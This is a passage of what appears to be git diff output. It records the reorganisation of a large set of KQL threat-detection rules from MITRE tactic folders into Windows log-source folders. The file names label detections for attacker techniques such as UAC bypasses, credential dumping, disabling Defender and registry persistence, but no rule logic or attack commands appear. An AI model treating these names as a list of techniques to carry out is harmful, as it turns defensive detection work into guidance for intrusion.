windows/process_creation}/system_network_connections_discovery_via_net_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/tamper_windows_defender_remove_mppreference.kql (100%) rename KQL/rules/{Exfiltration => windows/process_creation}/tap_installer_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/taskkill_symantec_endpoint_protection.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/taskmgr_as_local_system.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/tasks_folder_evasion.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/terminal_service_process_spawn.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/time_travel_debugging_utility_usage.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/tor_client_browser_execution.kql (59%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/trustedpath_uac_bypass_pattern.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_abusing_winsat_path_parsing_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_tools_using_computerdefaults.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_using_changepk_and_slui.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_using_consent_and_comctl32_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_using_disk_cleanup.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_using_dismhost.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_using_event_viewer_recentviews.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/uac_bypass_using_idiagnostic_profile.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/process_creation}/uac_bypass_using_ieinstal_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_using_msconfig_token_modification_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_using_ntfs_reparse_point_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_using_pkgmgr_and_dism.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_using_windows_media_player_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_via_icmluautil.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_via_windows_firewall_snap_in_hijack.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uac_bypass_wsreset.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/uefi_persistence_via_wpbbin_processcreation.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uncommon_addinutil_exe_commandline_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uncommon_assistive_technology_applications_execution_via_atbroker_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uncommon_child_process_of_addinutil_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uncommon_child_process_of_appvlp_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/uncommon_child_process_of_bginfo_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uncommon_child_process_of_defaultpack_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uncommon_child_process_of_setres_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uncommon_child_process_spawned_by_odbcconf_exe.kql (100%) rename KQL/rules/{Execution => 
windows/process_creation}/uncommon_child_processes_of_sndvol_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uncommon_filesystem_load_attempt_by_format_com.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uncommon_link_exe_parent_process.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/uncommon_one_time_only_scheduled_task_at_00_00.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uncommon_sigverif_exe_child_process.kql (100%) create mode 100644 KQL/rules/windows/process_creation/uncommon_svchost_command_line_parameter.kql rename KQL/rules/{Defense Evasion => windows/process_creation}/uncommon_svchost_parent_process.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/uncommon_system_information_discovery_via_wmic_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/uncommon_userinit_child_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uninstall_crowdstrike_falcon_sensor.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/uninstall_sysinternals_sysmon.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/unmount_share_via_net_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/unsigned_appx_installation_attempt_using_add_appxpackage.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/unusual_child_process_of_dns_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/unusual_parent_process_for_cmd_exe.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/usage_of_web_request_commands_and_cmdlets.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/use_icacls_to_hide_file_to_everyone.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/process_creation}/use_ntfs_short_name_in_command_line.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/use_ntfs_short_name_in_image.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/use_of_fsharp_interpreters.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/use_of_openconsole.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/use_of_pcalua_for_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/use_of_remote_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/use_of_scriptrunner_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/use_of_the_sftp_exe_binary_as_a_lolbin.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/use_of_ttdinject_exe.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/use_of_ultravnc_remote_access_software.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/use_of_visualuiaverifynative_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/use_of_vsiisexelauncher_exe.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/use_of_w32tm_as_timer.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/use_of_wfc_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/use_short_name_path_in_image.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/user_added_to_highly_privileged_group.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/user_added_to_local_administrators_group.kql (100%) rename KQL/rules/{Initial Access => windows/process_creation}/user_added_to_remote_desktop_users_group.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/user_discovery_and_export_via_get_aduser_cmdlet.kql (100%) rename KQL/rules/{Privilege Escalation => 
windows/process_creation}/using_settingsynchost_exe_as_lolbin.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/utilityfunctions_ps1_proxy_dll.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/veeam_backup_database_suspicious_query.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/veeambackup_database_credentials_dump_via_sqlcmd_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/verclsid_exe_runs_com_object.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/virtualbox_driver_installation_or_starting_of_vms.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/visual_basic_command_line_compiler_usage.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/visual_studio_code_tunnel_execution.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/visual_studio_code_tunnel_service_installation.kql (100%) rename KQL/rules/{Command and Control => windows/process_creation}/visual_studio_code_tunnel_shell_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/visual_studio_nodejstools_pressanykey_renamed_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/vmtoolsd_suspicious_child_process.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/volumeshadowcopy_symlink_creation_via_mklink.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/wab_execution_from_non_default_location.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/wab_wabmig_unusual_parent_or_child_processes.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/weak_or_abused_passwords_in_cli.kql (100%) rename KQL/rules/{Exfiltration => 
windows/process_creation}/webdav_client_execution_via_rundll32_exe.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/webshell_detection_with_command_line_keywords.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/webshell_hacking_activity_patterns.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/webshell_tool_reconnaissance_activity.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/whoami_as_parameter.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/whoami_exe_execution_anomaly.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/whoami_exe_execution_from_privileged_process.kql (100%) rename KQL/rules/{Discovery => windows/process_creation}/whoami_exe_execution_with_output_option.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/windows_admin_share_mount_via_net_exe.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/windows_backup_deleted_via_wbadmin_exe.kql (100%) rename KQL/rules/{Credential Access => windows/process_creation}/windows_credential_manager_access_via_vaultcmd.kql (100%) create mode 100644 KQL/rules/windows/process_creation/windows_default_domain_gpo_modification_via_gpme.kql rename KQL/rules/{Defense Evasion => windows/process_creation}/windows_defender_context_menu_removed.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/windows_defender_definition_files_removed.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/windows_firewall_disabled_via_powershell.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/windows_internet_hosted_webdav_share_mount_via_net_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/windows_kernel_debugger_execution.kql (100%) rename KQL/rules/{Defense 
Evasion => windows/process_creation}/windows_processes_suspicious_parent_directory.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/windows_recall_feature_enabled_via_reg_exe.kql (100%) rename KQL/rules/{Impact => windows/process_creation}/windows_recovery_environment_disabled_via_reagentc.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/windows_share_mount_via_net_exe.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/winrar_compressing_dump_files.kql (100%) rename KQL/rules/{Collection => windows/process_creation}/winrar_execution_in_non_standard_folder.kql (100%) rename KQL/rules/{Lateral Movement => windows/process_creation}/winrs_local_command_execution.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/wlrmdr_exe_uncommon_argument_or_child_process.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/wmi_backdoor_exchange_transport_agent.kql (100%) rename KQL/rules/{Persistence => windows/process_creation}/wmi_persistence_script_event_consumer.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/wmic_remote_command_execution.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/wmiprvse_spawned_a_process.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/write_protect_for_storage_disabled.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/writing_of_malicious_files_to_the_fonts_folder.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/wscript_shell_run_in_commandline.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/wsl_child_process_anomaly.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/wsl_kali_linux_usage.kql (100%) rename KQL/rules/{Execution => windows/process_creation}/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/process_creation}/xbap_execution_from_uncommon_locations_via_presentationhost_exe.kql (100%) rename KQL/rules/{Defense Evasion => windows/process_creation}/xsl_script_execution_via_wmic_exe.kql (100%) rename KQL/rules/{Privilege Escalation => windows/process_creation}/xwizard_exe_execution_from_non_default_location.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_add}/potential_persistence_via_disk_cleanup_handler_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_delete}/delete_defender_scan_shellex_context_menu_registry_key.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_delete}/folder_removed_from_exploit_guard_protectedfolders_list_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_delete}/removal_of_amsi_provider_registry_keys.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_delete}/removal_of_index_value_to_hide_schedule_task_registry.kql (67%) rename KQL/rules/{Persistence => windows/registry/registry_delete}/removal_of_potential_com_hijacking_registry_keys.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_delete}/removal_of_sd_value_to_hide_schedule_task_registry.kql (64%) rename KQL/rules/{Defense Evasion => windows/registry/registry_delete}/runmru_registry_key_deletion_registry.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_delete}/terminal_server_client_connection_history_cleared_registry.kql (100%) rename KQL/rules/{Collection => windows/registry/registry_delete}/windows_recall_feature_enabled_disableaidataanalysis_value_deleted.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_event}/atbroker_registry_change.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_event}/cmstp_execution_registry_event.kql (100%) rename KQL/rules/{Persistence => 
windows/registry/registry_event}/creation_of_a_local_hidden_user_account_by_registry.kql (91%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_event}/dll_load_via_lsass.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_event}/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql (100%) rename KQL/rules/{Credential Access => windows/registry/registry_event}/esentutl_volume_shadow_copy_service_keys.kql (100%) rename KQL/rules/{Resource Development => windows/registry/registry_event}/hybridconnectionmanager_service_installation_registry.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_event}/narrator_s_feedback_hub_persistence.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_event}/netntlm_downgrade_attack_registry.kql (100%) rename KQL/rules/{Lateral Movement => windows/registry/registry_event}/new_portproxy_registry_entry_added.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_event}/office_application_startup_office_test.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_event}/path_to_screensaver_binary_modified.kql (100%) rename KQL/rules/{Credential Access => windows/registry/registry_event}/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_event}/potential_qakbot_registry_activity.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_event}/redmimicry_winnti_playbook_registry_manipulation.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_event}/registry_entries_for_azorult_malware.kql (100%) create mode 100644 KQL/rules/windows/registry/registry_event/registry_tampering_by_potentially_suspicious_processes.kql rename KQL/rules/{Persistence => windows/registry/registry_event}/run_once_task_configuration_in_registry.kql (100%) rename KQL/rules/{Privilege Escalation => 
windows/registry/registry_event}/security_support_provider_ssp_added_to_lsa_configuration.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_event}/shell_open_registry_keys_manipulation.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_event}/sticky_key_like_backdoor_usage_registry.kql (100%) rename KQL/rules/{Collection => windows/registry/registry_event}/suspicious_camera_and_microphone_access.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_event}/suspicious_run_key_from_download.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_event}/uac_bypass_via_wsreset.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_event}/wdigest_credguard_registry_modification.kql (100%) rename KQL/rules/{Credential Access => windows/registry/registry_event}/windows_credential_editor_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_event}/windows_defender_threat_severity_default_action_modified.kql (100%) rename KQL/rules/{Initial Access => windows/registry/registry_event}/windows_registry_trust_record_modification.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_event}/winekey_registry_modification.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/activate_suppression_of_windows_security_center_notifications.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/add_debugger_entry_to_aedebug_for_persistence.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/add_debugger_entry_to_hangs_key_for_persistence.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/add_disallowrun_execution_to_registry.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/add_port_monitor_persistence_in_registry.kql (100%) rename KQL/rules/{Persistence => 
windows/registry/registry_set}/allow_rdp_remote_assistance_feature.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/bypass_uac_using_delegateexecute.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/bypass_uac_using_event_viewer.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/bypass_uac_using_silentcleanup_task.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/change_the_fax_dll.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/change_user_account_associated_with_the_fax_service.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/change_winevt_channel_access_permission_via_registry.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/classes_autorun_keys_modification.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/clickonce_trust_prompt_tampering.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/com_hijack_via_sdclt.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/com_hijacking_via_treatas.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/common_autorun_keys_modification.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/crashcontrol_crashdump_disabled.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/currentcontrolset_autorun_keys_modification.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/currentversion_autorun_keys_modification.kql (100%) rename 
KQL/rules/{Privilege Escalation => windows/registry/registry_set}/currentversion_nt_autorun_keys_modification.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/custom_file_open_handler_executes_powershell.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/default_rdp_port_changed_to_non_standard_port.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/dhcp_callout_dll_installation.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/directory_service_restore_mode_dsrm_registry_value_tampering.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/disable_administrative_share_creation_at_startup.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/disable_exploit_guard_network_protection_on_windows_defender.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/disable_internal_tools_or_feature_in_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/disable_macro_runtime_scan_scope.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/disable_microsoft_defender_firewall_via_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/disable_privacy_settings_experience_in_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/disable_pua_protection_on_windows_defender.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/disable_tamper_protection_on_windows_defender.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/disable_windows_defender_functionalities_via_registry_keys.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/disable_windows_event_logging_via_registry.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/registry/registry_set}/disable_windows_firewall_by_registry.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/disable_windows_security_center_notifications.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/disabled_windows_defender_eventlog.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/displaying_hidden_files_feature_disabled.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/dns_over_https_enabled_by_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/driver_added_to_disallowed_images_in_hvci_registry.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/enable_lm_hash_storage.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/enable_local_manifest_installation_with_winget.kql (100%) rename KQL/rules/{Execution => windows/registry/registry_set}/enable_microsoft_dynamic_data_exchange.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/enabling_cor_profiler_environment_variables.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/etw_logging_disabled_for_rpcrt4_dll.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/etw_logging_disabled_for_scm.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/etw_logging_disabled_in_net_processes_sysmon_registry.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/execution_dll_of_choice_using_wab_exe.kql (100%) create mode 100644 KQL/rules/windows/registry/registry_set/filefix_command_evidence_in_typedpaths.kql rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/hide_schedule_task_via_index_value_tamper.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/hiding_user_account_via_specialaccounts_registry_key.kql (100%) rename KQL/rules/{Defense Evasion => 
windows/registry/registry_set}/hypervisor_enforced_code_integrity_disabled.kql (69%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/hypervisor_enforced_paging_translation_disabled.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/ie_change_domain_zone.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/internet_explorer_autorun_keys_modification.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/internet_explorer_disablefirstruncustomize_enabled.kql (100%) rename KQL/rules/{Command and Control => windows/registry/registry_set}/lolbas_onedrivestandaloneupdater_exe_proxy_download.kql (100%) rename KQL/rules/{Credential Access => windows/registry/registry_set}/lsass_full_dump_request_via_dumptype_registry_settings.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/macro_enabled_in_a_potentially_suspicious_document.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/maxmpxct_registry_value_changed.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/microsoft_office_protected_view_disabled.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/modification_of_ie_registry_settings.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/modify_user_shell_folders_startup_value.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/net_ngenassemblyusagelog_registry_key_tamper.kql (100%) rename KQL/rules/{Execution => windows/registry/registry_set}/new_application_in_appcompat.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/new_bginfo_exe_custom_db_path_registry_configuration.kql (100%) rename KQL/rules/{Persistence => 
windows/registry/registry_set}/new_bginfo_exe_custom_vbscript_registry_configuration.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/new_bginfo_exe_custom_wmi_query_registry_configuration.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/new_dns_serverlevelplugindll_installed.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/new_file_association_using_exefile.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/new_netsh_helper_dll_registered_from_a_suspicious_location.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/new_odbc_driver_registered.kql (100%) rename KQL/rules/{Impact => windows/registry/registry_set}/new_root_or_ca_or_authroot_certificate_to_store.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/new_run_key_pointing_to_suspicious_folder.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/new_timeproviders_registered_with_uncommon_dll_name.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/office_autorun_keys_modification.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/office_macros_warning_disabled.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/old_tls1_0_tls1_1_protocol_version_enabled.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/outlook_macro_execution_without_warning_setting_enabled.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/outlook_security_settings_updated_registry.kql (100%) rename KQL/rules/{Collection => windows/registry/registry_set}/periodic_backup_for_system_registry_hives_enabled.kql (100%) rename KQL/rules/{Persistence => 
windows/registry/registry_set}/persistence_via_disk_cleanup_handler_autorun.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/persistence_via_hhctrl_ocx.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/persistence_via_new_sip_provider.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_amsi_com_server_hijacking.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_attachment_manager_settings_associations_tamper.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_attachment_manager_settings_attachments_tamper.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_autologger_sessions_tampering.kql (100%) rename KQL/rules/{Execution => windows/registry/registry_set}/potential_clickfix_execution_pattern_registry.kql (59%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_cobaltstrike_service_installations_registry.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_com_object_hijacking_via_treatas_subkey_registry.kql (66%) rename KQL/rules/{Credential Access => windows/registry/registry_set}/potential_credential_dumping_attempt_using_new_networkprovider_reg.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_eventlog_file_location_tampering.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_pendingfilerenameoperations_tampering.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_persistence_using_debugpath.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_persistence_via_app_paths_default_property.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_persistence_via_appcompat_registerapprestart_layer.kql (100%) 
rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_persistence_via_autodialdll.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_persistence_via_chm_helper_dll.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_persistence_via_custom_protocol_handler.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_persistence_via_dllpathoverride.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_persistence_via_event_viewer_events_asp.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_persistence_via_excel_add_in_registry.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_persistence_via_globalflags.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_persistence_via_logon_scripts_registry.kql (86%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_persistence_via_lsa_extensions.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_persistence_via_mpnotify.kql (100%) rename KQL/rules/{Persistence => windows/registry/registry_set}/potential_persistence_via_mycomputer_registry_keys.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_persistence_via_netsh_helper_dll_registry.kql (100%) create mode 100644 KQL/rules/windows/registry/registry_set/potential_persistence_via_new_amsi_providers_registry.kql rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_persistence_via_outlook_home_page.kql (100%) rename KQL/rules/{Privilege Escalation => windows/registry/registry_set}/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql (100%) rename KQL/rules/{Defense Evasion => windows/registry/registry_set}/potential_persistence_via_outlook_today_page.kql (100%) rename 
